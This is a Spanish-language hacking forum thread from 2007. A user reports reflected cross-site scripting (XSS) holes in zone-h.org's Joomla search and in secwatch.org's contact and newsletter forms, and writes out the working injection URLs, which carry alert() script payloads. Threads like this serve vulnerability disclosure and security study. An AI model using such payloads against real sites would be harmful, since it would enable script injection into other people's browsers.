XSS en Zone-H

WHK · 27 Octubre 2007, 16:53 PM

Encontré un XSS en zone-h

...muy curioso no?

http://www.zone-h.org/index.php?searchword=`´';}"></script><script>alert(/xss/);</script>&option=com_search&Itemid=5

Lo puse en xssed haber si lo ven antes que lo reparen y despues les aviso.

Por lo que vi hay muchos otros descubierto por otras personas... ya no me dan ganas de usar joomla jajajja.

yeikos · 29 Octubre 2007, 23:44 PM

Citarhttp://secwatch.org/advisories/1019243/

WHK · 30 Octubre 2007, 02:16 AM

Juazz

Código [Seleccionar]

http://secwatch.org/?page=contact&name=a"><script>alert(/xss/);</script>

Además que raro cada ves que cambias pone una imagen diferente segun lo que escribas:

Código [Seleccionar]


http://secwatch.org/account/?mode=newsletter&email=plop@tu.yossssssss'%22%3E%3Ch1%3Elol
http://secwatch.org/account/?mode=newsletter&email=holaaaaaaaa

Man-In-the-Middle · 30 Octubre 2007, 02:25 AM

jajajaj XD!!, que no aprende ehh, que pasoo whk, no se te ve por el msn??

WHK · 30 Octubre 2007, 02:29 AM

weee te bajaron el rango jajajajjaja ...ahi te veo

Salu2

Test Foro de elhacker.net SMF 2.1

XSS en Zone-H

WHK

yeikos

WHK

Man-In-the-Middle

WHK